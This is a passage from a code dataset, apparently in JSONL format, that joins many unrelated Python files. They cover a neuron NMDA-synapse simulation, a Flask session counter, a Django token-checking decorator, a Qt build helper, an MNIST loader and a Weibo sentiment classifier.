re.fullmatch(r'.+-(?:w|h)[0-9]+\\.(?:{ext})'.format(ext='|'.join(ALLOWED_EXTENSIONS)), filename)\n\ndef getRequestedParameters(filename):\n result = {\n 'width': None,\n 'height': None\n }\n raw_params_string = re.findall(r'(?:-(?:w|h)[0-9]+)+', filename)\n if not len(raw_params_string): return False\n raw_params = re.findall(r'-(?:w|h)[0-9]+', raw_params_string[-1])\n result['name'] = filename.replace(raw_params_string[-1], '')\n raw_params.reverse()\n for param in raw_params:\n if param[1] == 'w' and result['width'] is None:\n result['width'] = int(param[2:])\n if param[1] == 'h' and result['height'] is None:\n result['height'] = int(param[2:])\n return result","sub_path":"app/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"601076463","text":"from decorator import decorator\nfrom line_profiler import LineProfiler\n\n@decorator\ndef profile_each_line(func, *args, **kwargs):\n profiler = LineProfiler()\n profiled_func = profiler(func)\n try:\n profiled_func(*args, **kwargs)\n finally:\n profiler.print_stats()","sub_path":"all-gists/6583590/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"220460205","text":"#!/usr/bin/env python3\n\nTEST = 'large'\nIN = 'A-{}.in'.format(TEST)\nOUT = 'A-{}.out'.format(TEST)\n\nq = {\n 'P': ('P', 'R'),\n 'R': ('R', 'S'),\n 'S': ('P', 'S'),\n}\n\ndef plan(n, ch):\n if n == 0:\n return ch, int(ch == 'R'), int(ch == 'P'), int(ch == 'S')\n a, ra, pa, sa = plan(n-1, q[ch][0])\n b, rb, pb, sb = plan(n-1, q[ch][1])\n return min(a + b, b + a), ra + rb, pa + pb, sa + sb\n\n\ndef good_plans(n, r, p, s):\n for c in q.keys():\n pl, pr, pp, ps = plan(n, c)\n if (pr, pp, ps) == (r, p, s):\n yield pl\n\ndef run(n, r, p, s):\n return min(good_plans(n, r, p, s), default='IMPOSSIBLE')\n\n\ndef main():\n with open(IN) as fin, open(OUT, 'w') as fout:\n t = int(fin.readline().strip())\n for i in range(t):\n n, r, p, s = map(int, fin.readline().split())\n res = run(n, r, p, s)\n print('Case #{}: {}'.format(i + 1, res), file=fout)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"codes/BuildLinks1.10/test_input/CodeJam/2A/python/Vytis_A.py","file_name":"Vytis_A.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"501540928","text":"\"\"\"Computes the loss for a batch and applies updates.\"\"\"\nfrom typing import Any, Dict, List\n\nimport torch\n\nfrom agent.learning import auxiliary\nfrom agent.model.model_wrappers import model_wrapper\n\n\ndef apply_batch_loss(model: model_wrapper.ModelWrapper, examples: List[Any], optimizer: torch.optim.Optimizer):\n \"\"\" Trains a batch for a model with auxiliary losses. \"\"\"\n optimizer.zero_grad()\n\n # Compute the main loss and auxiliary losses\n main_loss, auxiliary_losses = model.loss(examples)\n\n total_loss = main_loss\n\n # Apply the auxiliary losses\n auxiliary_coefficients: Dict[auxiliary.Auxiliary, float] = model.get_auxiliaries()\n\n for aux_type, coefficient in auxiliary_coefficients.items():\n total_loss += coefficient * auxiliary_losses[aux_type]\n\n total_loss.backward()\n optimizer.step()\n\n return total_loss.item(), main_loss, auxiliary_losses\n","sub_path":"agent/learning/batch_loss.py","file_name":"batch_loss.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"242112399","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 5 17:18:48 2020\r\n\r\n@author: Naman\r\n\"\"\"\r\n\r\nimport random as r\r\n\r\ndef randGenerator(n,m):\r\n arr = []\r\n for i in range(n):\r\n array = []\r\n for j in range(m):\r\n array.append(r.choice([0,1]))\r\n arr.append(array)\r\n return arr\r\n\r\ndef printing(arr,n,m,a,b):\r\n for i in range(n):\r\n for j in range(m):\r\n if a==i and b==j and b==0:\r\n if j==0:\r\n print(\"\", end=\"\")\r\n print(\"<\",end=\"\")\r\n print(arr[i][j], end=\"> \")\r\n \r\n elif a == i and b == j+1:\r\n if j==0:\r\n print(\" \", end=\"\")\r\n print(arr[i][j], end=\" <\")\r\n elif a == i and b == j:\r\n if j==0:\r\n print(\" \", end=\"\")\r\n print(arr[i][j], end=\"> \")\r\n else:\r\n if j==0:\r\n print(\" \", end=\"\")\r\n print(arr[i][j], end=\" \")\r\n print()\r\n \r\ndef cleaner(arr,n,m):\r\n pos = 0;\r\n for i in range(n):\r\n if pos==0:\r\n for j in range(m):\r\n pos = j\r\n printing(arr = arr, n = n, m = m, a = i, b = j)\r\n if arr[i][j] == 1:\r\n print(\"Percepting Dirt....CLeaning....moving ahead\")\r\n arr[i][j]=0\r\n else:\r\n print(\"Already clean....moving ahead\")\r\n else:\r\n for j in range(m):\r\n pos = m-j-1;\r\n printing(arr = arr, n = n, m = m, a = i, b = m -j -1)\r\n if arr[i][m-j-1] == 1:\r\n print(\"Percepting Dirt....CLeaning....moving ahead\")\r\n arr[i][m -j -1]=0\r\n else:\r\n print(\"Already clean....moving ahead\")\r\n \r\n \r\ndef main():\r\n print(\"Enter the values of: \")\r\n n=int(input(\"N = \"))\r\n m=int(input(\"M = \"))\r\n arr = randGenerator(n = n, m = m)\r\n #printing(arr = arr, n = n, m = m,a=1,b=0)\r\n cleaner(arr=arr, n = n, m=m)\r\n print()\r\n printing(arr = arr, n = n, m = m, a = n+1, b = m+1)\r\n print(\"Everything Cleaned\")\r\nmain()\r\n ","sub_path":"Lab - 5_VacuumCleaner.py","file_name":"Lab - 5_VacuumCleaner.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"211249817","text":"import pandas as pd \n\n\nAUCTION_FILENAME = 'data/static/wayne_county_auction_list_10152019/reach_auction_list.csv'\nMAIN_REACH_FILENAME = 'data/processed/10212019/reach_webhook.csv'\nFINAL_FILENAME = 'data/static/wayne_county_auction_list_10152019/main_reach_with_auction.csv'\n\n\ndef main():\n\n\tauction_data = pd.read_csv(AUCTION_FILENAME)\n\tmain_reach_data = pd.read_csv(MAIN_REACH_FILENAME)\n\n\tmerged_data = pd.merge(main_reach_data, auction_data, on='address')\n\n\tmerged_data.to_csv(FINAL_FILENAME)\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"processors/non_recurring/reach_auction_join_main.py","file_name":"reach_auction_join_main.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"307655799","text":"from imbuild.utils import obtain_parameters, optional, requirement\nfrom imbuild.collection import Collection\nfrom imbuild.dependency import create_dependency\nfrom imbuild.rule import Rule\nfrom os.path import basename, dirname\nfrom subprocess import call\nimport shutil\n\n\nclass QTModule:\n def __init__(self, name):\n self.name = name\n\n\nQOBJECT_PARAMETERS = [\n optional('sources', []),\n requirement('moc_source_dir'),\n optional('includes', [])\n]\n\n\ndef remove_ext(x):\n return basename(x).split('.')[0]\n\n\ndef get_dirname(x):\n return dirname(x)\n\n\ndef moc_source_location_transform(x):\n return f'{dirname(x)}/moc/moc_{remove_ext(x)}.cpp'\n\n\ndef moc_files(QT_DIR, files, transform=moc_source_location_transform):\n for f in files:\n call([QT_DIR + '/bin/moc', f, '-o', transform(f)])\n\n\ndef create_qobject_collection(QT_DIR, **kwargs):\n args = obtain_parameters(kwargs, QOBJECT_PARAMETERS)\n moc = Rule(name='moc', command=f'{QT_DIR}/bin/moc $in -o $out', description=\"MOC $in to $out\")\n\n moc_files = Collection(moc, args.sources, args.moc_source_dir)\n moc_files.store = args\n moc_files.set_output_transform(moc_source_location_transform)\n return moc_files\n\n\ndef lib_to_define(name):\n content = name.replace('Qt', '').upper()\n return f'QT_{content}_LIB'\n\n\ndef qt_dependency(QT_DIR, *args):\n qt_inc = QT_DIR + 'include/'\n qt_libd = QT_DIR + 'lib/'\n\n dep = create_dependency(includes=[qt_inc],\n libdirs=[qt_libd],\n links=[],\n defines=[])\n for arg in args:\n if type(arg) is QTModule:\n dep.includes.append(qt_inc + arg.name)\n dep.links.append(arg.name.replace('Qt', 'Qt5'))\n dep.defines.append(lib_to_define(arg.name))\n return dep\n\n\ndef qt_copy_dependencies(QT_DIR, qt_dep, binary_dir, posfix=''):\n qt_bin_dir = QT_DIR + 'bin/'\n for links in qt_dep.links:\n target_name = qt_bin_dir + links + posfix + '.dll'\n shutil.copy(target_name, binary_dir)\n","sub_path":"imbuild/external/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"650896994","text":"#Hierarchically indexed data\n\nimport pandas as pd\nimport numpy as np\n\ndf1 = pd.DataFrame({'key1': ['MH', 'MH', 'MH','TN','TN'],\n 'key2': [2000,2001,2002,2001,2002],\n 'lqty': [3,2,5,6,9]})\ndf2 = pd.DataFrame(np.arange(12).reshape((6,2)),index=[['TN','TN','MH','MH','MH','MH'],\n [2000,2000,2000,2000,2001,2002]],\n columns=['event1','event2'])\n\n#print(df2)\n#print(df2.loc['TN']) # returns all entries under TN\n#print(df2.loc['TN'].loc[2000]) # returns only those entries with TN and 2000\n\n#print(pd.merge(df1,df2,left_on=['key1','key2'], right_index=True))","sub_path":"python_training/samp_proj1/day_011118/d_wrangling3.py","file_name":"d_wrangling3.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"412205774","text":"import numpy as np\nfrom neuron import h\n\nimport neat\nfrom neat import NeuronSimTree, MorphLoc\n\nimport copy\n\n\n# simulation\nT_MAX = 300.\nDT = 0.1\n# EXPERIMENT\nDELTA_T = 20. # ms\nT0 = 60. # ms\n# physiology\nEL = -75. # mV\n\n# AMPA synapse parameters\nTAU_AMPA = 2. # ms\n# NMDA synapse parameters\nE_REV_NMDA = 5. # mV\nC_MG = 1. # mM\nDUR_REL = 0.5 # ms\nAMP_REL = 2. # mM\n\n\ndef calcAmpWidthSurface(v_arr, t0, dt=DT, teps=3.):\n \"\"\"\n compute amplitude, width and surface of NMDA spike from voltage trace\n \"\"\"\n i0 = int(t0/dt)\n i_ = int(teps/dt)\n v_eq = v_arr[0]\n\n amp = np.max(v_arr[i0+i_:]) - v_eq\n width = dt * np.where(v_arr[i0:] > (amp/2.+ v_eq))[0][-1]\n surf = dt * (np.sum(v_arr[i0:] - v_eq))\n\n return amp, width, surf\n\n\ndef subtractAP(v_m, v_ap, ix_spike, ix_loc):\n \"\"\"\n Subtracts AP waveform in `v_ap` from AP waveform in `v_m`. Waveforms are\n aligned at the peak.\n\n `ix_spike` gives first and last index of window in which spike occured\n `ix_loc` gives location where peak time is measured\n \"\"\"\n\n i_peak_m = ix_spike[0] + np.argmax(v_m[ix_loc, ix_spike[0]:ix_spike[1]])\n i_peak_ap = np.argmax(v_ap[ix_loc])\n\n i0 = i_peak_m - i_peak_ap\n i1 = i0 + len(v_ap[ix_loc])\n i2 = min(len(v_m[ix_loc])-i0, len(v_ap[ix_loc]))\n\n v_m_ = copy.deepcopy(v_m)\n v_m_[:,i0:i1] -= v_ap[:,:i2]\n\n return v_m_\n\n\ndef deviationThrFromLinear(arr, f_eps=1.2):\n \"\"\"\n Compute the threshold by finding where it has deviated by more than a factor\n `f_eps` from linear.\n \"\"\"\n assert len(arr) > 2\n\n x_arr = np.arange(len(arr))\n\n import sklearn.linear_model as lm\n lr = lm.LinearRegression()\n lr.fit(x_arr[:,None], arr, np.exp(-x_arr))\n f_arr = lr.coef_[0] * x_arr + lr.intercept_\n\n try:\n ix_max = np.where((arr[1:]-f_arr[0]) > f_eps * (f_arr[1:]-f_arr[0]))[0][0]\n ix_max += 1\n except IndexError:\n ix_max = len(arr)-1\n\n return ix_max\n\n\nclass NMDASimTree(NeuronSimTree):\n def __init__(self, **kwargs):\n super(NMDASimTree, self).__init__(**kwargs)\n\n self.pres = []\n self.nmdas = []\n\n def deleteModel(self):\n super(NMDASimTree, self).deleteModel()\n self.pres = []\n self.nmdas = []\n\n def addAMPASynapse(self, loc, g_max, tau):\n loc = MorphLoc(loc, self)\n # create the synapse\n syn = h.AlphaSynapse(self.sections[loc['node']](loc['x']))\n syn.tau = tau\n syn.gmax = g_max\n # store the synapse\n self.syns.append(syn)\n\n return len(self.syns)-1\n\n def addNMDASynapse(self, loc, g_max, e_rev, c_mg, dur_rel, amp_rel):\n loc = MorphLoc(loc, self)\n # create the synapse\n syn = h.NMDA_Mg_T(self.sections[loc['node']](loc['x']))\n syn.gmax = g_max\n syn.Erev = e_rev\n syn.mg = c_mg\n # create the presynaptic segment for release\n pre = h.Section(name='pre %d'%len(self.pres))\n pre.insert('release_BMK')\n pre(0.5).release_BMK.dur = dur_rel\n pre(0.5).release_BMK.amp = amp_rel\n # connect\n h.setpointer(pre(0.5).release_BMK._ref_T, 'C', syn)\n # store the synapse\n self.nmdas.append(syn)\n self.pres.append(pre)\n\n return len(self.nmdas) - 1\n\n def setSpikeTime(self, syn_index_ampa, syn_index_nmda, spike_time):\n spk_tm = spike_time + self.t_calibrate\n # add spike for AMPA synapse\n self.syns[syn_index_ampa].onset = spk_tm\n # add spike for NMDA synapse\n self.pres[syn_index_nmda](0.5).release_BMK.delay = spk_tm\n\n def addCombinedSynapse(self, loc, g_max_ampa, g_max_nmda):\n global TAU_AMPA, E_REV_NMDA, C_MG, DUR_REL, AMP_REL\n # ampa synapse\n syn_idx_ampa = self.addAMPASynapse(loc, g_max_ampa, TAU_AMPA)\n # nmda synapse\n 
syn_idx_nmda = self.addNMDASynapse(loc, g_max_nmda, E_REV_NMDA, C_MG, DUR_REL, AMP_REL)\n\n return syn_idx_ampa, syn_idx_nmda\n\n def setActivation(self, loc, n_syn, g_max_ampa, g_max_nmda, t0=T0, delta_t=DELTA_T):\n for ii in range(n_syn):\n syn_idx_ampa, syn_idx_nmda = self.addCombinedSynapse(loc, g_max_ampa, g_max_nmda)\n self.setSpikeTime(syn_idx_ampa, syn_idx_nmda, t0)\n for ii in range(n_syn):\n syn_idx_ampa, syn_idx_nmda = self.addCombinedSynapse(loc, g_max_ampa, g_max_nmda)\n self.setSpikeTime(syn_idx_ampa, syn_idx_nmda, t0+delta_t)\n\n @neat.trees.morphtree.computationalTreetypeDecorator\n def runExperiment(self, loc, g_max_ampa, g_max_nmda, n_syn=10, with_ap=False, delta_t=0., loc_=None, n_syn_=20):\n \"\"\"\n Simulate the experiment with `n_syn` synapses at `loc`\n\n `with_ap` as ``True`` elicits ap with strong current pulse at soma\n \"\"\"\n global EL, T_MAX, DT, T0, DELTA_T\n loc = MorphLoc(loc, self)\n\n self.initModel(dt=DT, t_calibrate=200., v_init=EL, factor_lambda=1.)\n # add the synapses\n self.setActivation(loc, n_syn, g_max_ampa, g_max_nmda, t0=T0)\n if loc_ is not None:\n loc_ = MorphLoc(loc_, self)\n self.setActivation(loc_, n_syn_, g_max_ampa, g_max_nmda, t0=T0-DELTA_T)\n # add current clap\n if with_ap:\n self.addIClamp((1,.5), 4., T0+delta_t, 1.)\n # set recording locs\n rec_locs = [(1, .5), loc]\n if loc_ is not None:\n rec_locs.append(loc_)\n self.storeLocs(rec_locs, name='rec locs')\n # run the simulation\n res = self.run(T_MAX, pprint=True)\n # delete the model\n self.deleteModel()\n\n return res\n\n def extractAP(self, loc, delta_t=0):\n \"\"\"\n Extract action potential waveform\n \"\"\"\n res_ap = self.runExperiment(loc, n_syn=0, with_ap=True, delta_t=delta_t)\n v_ap = res_ap['v_m'] - res_ap['v_m'][:,0:1]\n\n i0 = int(T0/DT)\n i1 = int(200/DT) + i0\n\n return v_ap[:,i0:i1]\n\n def findNMDAThreshold(self, loc, n_syns, g_max_ampa, g_max_nmda, delta_t=0.,\n with_TTX=False, with_ap=False, at_soma=False, pplot=False,\n loc_=None, n_syn_=20):\n \"\"\"\n Extrac nmda spike threshold\n\n Returns\n -------\n n_syn_thr: int\n threshold number of synapses to activate\n res_nmda: dict of np.ndarray\n contains 'amp', 'width' and 'surf' of waveform elicited by second\n stimulus for each activation level\n res_sim: list of dict\n contains the voltage traces for each simulation\n at_soma: bool\n If ``True``, the threshold is measured at the soma. 
Otherwise at\n the dendritic synapse.\n \"\"\"\n global T0, DELTA_T, DT\n assert 0 not in n_syns\n\n lll = MorphLoc(loc, self)\n print(\"\\n--> Distance to soma = %.2f um \\n\"%self.distancesToSoma([lll])[0])\n\n if with_TTX:\n self.addTTX()\n\n ix_thr = 0 if at_soma else 1\n # extract baseline AP\n if with_ap:\n v_ap = self.extractAP(loc)\n ix_spike = (int((T0+delta_t)/DT), int((T0+delta_t+5.)/DT))\n\n res_sim = []\n res_nmda = {'amp': [],\n 'width': [],\n 'surf': []}\n for nn in n_syns:\n res = self.runExperiment(loc, g_max_ampa, g_max_nmda, n_syn=nn, delta_t=delta_t,\n with_ap=with_ap, loc_=loc_, n_syn_=n_syn_)\n if with_ap:\n res['v_m_'] = subtractAP(res['v_m'], v_ap, ix_spike, ix_thr)\n else:\n res['v_m_'] = copy.deepcopy(res['v_m'])\n res_sim.append(res)\n\n amp, width, surf = calcAmpWidthSurface(res['v_m_'][ix_thr], T0+DELTA_T, dt=DT)\n res_nmda['amp'].append(amp)\n res_nmda['width'].append(width)\n res_nmda['surf'].append(surf)\n\n if pplot:\n pl.figure()\n ax = pl.subplot(121)\n ax.set_title('soma')\n ax.plot(res['t'], res['v_m'][0], 'b')\n ax.plot(res['t'], res['v_m_'][0], 'r--')\n\n ax = pl.subplot(122)\n ax.set_title('dend')\n ax.plot(res['t'], res['v_m'][1], 'b')\n ax.plot(res['t'], res['v_m_'][1], 'r--')\n\n pl.show()\n\n for key, val in res_nmda.items(): res_nmda[key] = np.array(val)\n\n # nmda threshold as steepest surface increase\n n_syn_thr = deviationThrFromLinear(res_nmda['surf'])\n\n return n_syn_thr, res_nmda, res_sim","sub_path":"nmda.py","file_name":"nmda.py","file_ext":"py","file_size_in_byte":8563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"495578706","text":"import FWCore.ParameterSet.Config as cms\n\n#\n# Ecal part\n#\nfrom RecoLocalCalo.Configuration.ecalLocalRecoSequenceCosmics_cff import *\nfrom RecoLocalCalo.EcalRecAlgos.EcalSeverityLevelESProducer_cfi import *\n\n#defines a sequence ecalLocalRecoSequence\n#\n# Hcal part\n#\n# calo geometry\n#\n# changed by tommaso. now the calibrations are read from Configuration/StaqndardSequences/data/*Conditions.cff\n#\n# HCAL calibrations\n#include \"CalibCalorimetry/HcalPlugins/data/hardwired_conditions.cfi\"\n#HCAL reconstruction\nfrom RecoLocalCalo.Configuration.hcalLocalReco_cff import *\n#\n# sequence CaloLocalReco and CaloGlobalReco\n#\ncalolocalrecoCosmics = cms.Sequence(ecalLocalRecoSequenceCosmics+hcalLocalRecoSequence)\nhbheprereco.puCorrMethod = 0 \nhbheprereco.firstSample = 0\nhbheprereco.samplesToAdd = 10\nhbheprereco.correctForTimeslew = False\nhbheprereco.correctForPhaseContainment = False\nhoreco.firstSample = 0\nhoreco.samplesToAdd = 10\nhoreco.correctForTimeslew = False\nhoreco.correctForPhaseContainment = False\nhfreco.firstSample = 0\nhfreco.samplesToAdd = 10 ### min(10,size) in the algo\nhfreco.correctForTimeslew = False\nhfreco.correctForPhaseContainment = False\n#--- special temporary DB-usage unsetting \nhbheprereco.tsFromDB = False\nhfreco.tsFromDB = False\nhoreco.tsFromDB = False\nhfreco.digiTimeFromDB = False\nhbheprereco.recoParamsFromDB = cms.bool(False)\nhoreco.recoParamsFromDB = cms.bool(False)\nhfreco.recoParamsFromDB = cms.bool(False)\n#zdcreco.firstSample = 1\n#zdcreco.samplesToAdd = 8\nzdcreco.correctForTimeslew = True\nzdcreco.correctForPhaseContainment = True\nzdcreco.correctionPhaseNS = 10.\n#caloglobalreco = cms.Sequence(hcalGlobalRecoSequence)\n\n#\n# R.Ofierzynski (29.Oct.2009): add NZS sequence\n#\nfrom RecoLocalCalo.Configuration.hcalLocalRecoNZS_cff import *\ncalolocalrecoCosmicsNZS = cms.Sequence(ecalLocalRecoSequenceCosmics+hcalLocalRecoSequence+hcalLocalRecoSequenceNZS) \n","sub_path":"RecoLocalCalo/Configuration/python/RecoLocalCalo_Cosmics_cff.py","file_name":"RecoLocalCalo_Cosmics_cff.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"132834204","text":"from flask import Flask, render_template, session, redirect\napp = Flask(__name__)\napp.secret_key= 'akfnmbvdbmdgbp'\n\n\n\n@app.route('/')\ndef counter():\n \n if 'count' not in session:\n session['count'] = 0\n else:\n session['count'] += 1\n \n \n \n \n return render_template('index.html', count = session ['count'])\n\n\n\n@app.route('/destroy_session')\ndef destroy_session():\n session.clear()\n\n return redirect('/')\n\n\n\n\n\n\nif __name__==\"__main__\": \n app.run(debug=True)\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"619247419","text":"import sys\nsys.path.append('..')\n\nimport numpy as np\nimport os\n\ndef mnist(data_dir):\n fd = open(os.path.join(data_dir,'train-images-idx3-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n trX = loaded[16:].reshape((60000,28*28)).astype(float)\n\n fd = open(os.path.join(data_dir,'train-labels-idx1-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n trY = loaded[8:].reshape((60000))\n\n fd = open(os.path.join(data_dir,'t10k-images-idx3-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n teX = loaded[16:].reshape((10000,28*28)).astype(float)\n\n fd = open(os.path.join(data_dir,'t10k-labels-idx1-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n teY = loaded[8:].reshape((10000))\n\n trY = np.asarray(trY)\n teY = np.asarray(teY)\n\n return trX, teX, trY, teY\n\ndef mnist_with_valid_set(percentage, data_dir):\n trX, teX, trY, teY = mnist(data_dir)\n\n train_inds = np.arange(len(trX))\n np.random.shuffle(train_inds)\n trX = trX[train_inds]\n trY = trY[train_inds]\n #trX, trY = shuffle(trX, trY)\n n = 60000\n border = int(n*percentage)\n vaX = trX[border:]\n vaY = trY[border:]\n trX = trX[:border]\n trY = trY[:border]\n\n np.savetxt('train_inds.csv', train_inds)\n np.savetxt('percentage.csv', [percentage])\n\n return trX, vaX, teX, trY, vaY, teY\n\n\ndef load_mnist_with_valid_set(train_inds, percentage, data_dir):\n trX, teX, trY, teY = mnist(data_dir)\n\n trX = trX[train_inds]\n trY = trY[train_inds]\n #trX, trY = shuffle(trX, trY)\n n = 60000\n border = int(n*percentage)\n vaX = trX[border:]\n vaY = trY[border:]\n trX = trX[:border]\n trY = trY[:border]\n\n return trX, vaX, teX, trY, vaY, teY\n","sub_path":"Monte-Carlo-Attacks/Monte-Carlo-MNIST_GAN/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"233529705","text":"# -*- coding:utf-8 -*-\nimport os\n\nfrom sklearn import metrics\n\nimport numpy as np\nimport pandas as pd\nimport jieba\nimport re\nfrom gensim.models import word2vec\nimport math\nfrom sklearn.externals import joblib\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingClassifier\n\ndataset_path = ('./dataset')\n# 原始数据的csv文件\noutput_text_filename = 'raw_weibo_text.csv'\n# 清洗好后的csv文件\noutput_cln_text_filename = 'clean_weibo_text.csv'\n\n\ndef proc_text(raw_line):\n # 使用正则表达式去除非中文字符\n filter_pattern = re.compile('[^\\u4E00-\\u9FD5]+')\n chinese_only = filter_pattern.sub('', raw_line)\n\n words = []\n for word in chinese_only:\n words.append(word)\n\n return ' '.join(words)\n return featureVec\n\ndef split_train_test(text_df, size=0.8):\n \"\"\"\n 分割训练集和测试集\n \"\"\"\n # 为保证每个类中的数据能在训练集中和测试集中的比例相同,所以需要依次对每个类进行处理\n train_text_df = pd.DataFrame()\n test_text_df = pd.DataFrame()\n\n labels = [0, 1, 2, 3]\n for label in labels:\n # 找出label的记录\n text_df_w_label = text_df[text_df['labels'] == label]\n # 重新设置索引,保证每个类的记录是从0开始索引,方便之后的拆分\n text_df_w_label = text_df_w_label.reset_index()\n\n # 默认按80%训练集,20%测试集分割\n\n # 该类数据的行数\n n_lines = text_df_w_label.shape[0]\n split_line_no = math.floor(n_lines * size)\n text_df_w_label_train = text_df_w_label.iloc[:split_line_no, :]\n text_df_w_label_test = text_df_w_label.iloc[split_line_no:, :]\n\n # 放入整体训练集,测试集中\n train_text_df = train_text_df.append(text_df_w_label_train)\n test_text_df = test_text_df.append(text_df_w_label_test)\n\n train_text_df = train_text_df.reset_index()\n test_text_df = test_text_df.reset_index()\n return train_text_df, test_text_df\n\n\nprint('加载处理好的文本数据')\nclean_text_df = pd.read_csv(os.path.join(dataset_path, output_cln_text_filename), encoding='utf-8')\ntrain_text_df, test_text_df = split_train_test(clean_text_df)\nprint('训练集中各类数据的个数:', train_text_df.groupby('labels').size())\nprint('测试集中各类数据的个数:', test_text_df.groupby('labels').size())\n\n# 特征提取\n# 把训练集变成句子列表\n\ntrain=train_text_df['text']\ntf=TfidfVectorizer()\nX_train=tf.fit_transform(train)\nY_train = train_text_df['labels']\nprint(Y_train)\n\n\ngs=MultinomialNB()\ngs.fit(X_train, Y_train)\n\n\njoblib.dump(gs,'gs.m')\n\n\nstopwords = [line.rstrip() for line in open('中文停用词库.txt', 'r', encoding='utf-8')]\nwith open('微博评论/李小璐', 'r', encoding='utf-8') as f:\n lines = f.read().splitlines()\n\n text_series = pd.Series(lines)\n\n# 对文档进行只保留中文处理\ntext = text_series.map(proc_text)\n\nprint(text.head())\n\n# 构建句子列表,并去掉词汇之间的空格\ntext_list = []\nfor row in text:\n row = ''.join(str(row).split())\n text_list.append(str(row))\n\nprint(text_list)\n\n# 对每一句进行分词\ntexts = [[word for word in jieba.cut(doc)] for doc in text_list]\nprint(texts)\n\n# 对每一句进行去除停用词\ntext2 = []\n\nfor text in texts:\n words = []\n for text1 in text:\n if text1 not in stopwords:\n words.append(text1)\n text2.append(words)\nprint(text2)\n\nclf=joblib.load('gs.m')\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer, 
TfidfVectorizer\n\ntest=test_text_df['text']\nword_vec=tf.transform(test)\nprint('starting prediction')\nresult=clf.predict(word_vec)\nprint('prediction finished')\nr=pd.DataFrame(result)\nr.to_csv('r.csv')\n","sub_path":"model_predict.py","file_name":"model_predict.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"237968772","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\nimport logging\nimport json\nimport jwt\nfrom django.http import HttpResponse\nfrom django.utils.timezone import now\nfrom django.utils.timezone import timedelta\nfrom utils.request_utils import EMDBHandler\nfrom backstage.models import TokenModel\nfrom backstage.models import ErrorMessage\nfrom utils.common import save_obj_info\n# 为loggers中定义的名称\nlogger = logging.getLogger(\"vir_manager\")\n\n\ndef save_error_info(request, message):\n \"\"\"\n * desc 报错错误信息近数据库\n * input request 对象 错误信息\n * output None\n \"\"\"\n url = request.get_raw_uri()\n remote_addr = request.META.REMOTE_ADDR\n #user = request.user\n user = \"\"\n args = query_params(request)\n line = ErrorMessage()\n insert_dict = {\n 'url': url,\n 'remote_addr': remote_addr,\n 'user': user,\n 'args': str(args)\n }\n save_obj_info(line, insert_dict)\n\n\ndef check_login():\n def wraps(f):\n def de_ex(request, *args, **kwargs):\n token = request.COOKIES.get('jwttoken', '')\n if not token:\n token = request.META.get('HTTP_TOKEN', '')\n if not token:\n token = request.GET.get('token', '')\n if not token:\n token = request.POST.get('token', '')\n if not token:\n result = {\n \"message\": \"token缺失\",\n \"status\": -1,\n \"data\": {},\n }\n return HttpResponse(json.dumps(result), content_type=\"application/json\")\n else:\n # 检测是否在数据库中存储\n start = now().date()\n db_line = TokenModel.objects.filter(\n token=token, expire_time__gte=start)\n if not db_line:\n # 去sso认证\n emdb_handler = EMDBHandler(token)\n token_info = emdb_handler.verify_token()\n if token_info:\n # 保存已经验证过的token\n decode_info = jwt.decode(token, verify=False)\n setattr(request, 'user_id', decode_info['user_id'])\n setattr(request, 'user_name', decode_info['username'])\n info = {\n 'token': token_info['token'],\n 'user': decode_info['username'],\n 'start_time': start,\n 'expire_time': start + timedelta(hours=2)\n }\n line = TokenModel(**info)\n line.save()\n return f(request, *args, **kwargs)\n else:\n # token 失效\n result = {\n \"message\": \"token过期\",\n \"status\": -1,\n \"data\": {},\n }\n return HttpResponse(json.dumps(result), content_type=\"application/json\")\n return f(request, *args, **kwargs)\n return de_ex\n return wraps\n\n\ndef check_permission(token):\n \"\"\"\n * desc 根据token获取权限列表\n \"\"\"\n try:\n return 1\n except:\n raise Exception('EMDB 权限请求失败')\n return 0\n\n\ndef check_vir_permission(token):\n \"\"\"\n * desc 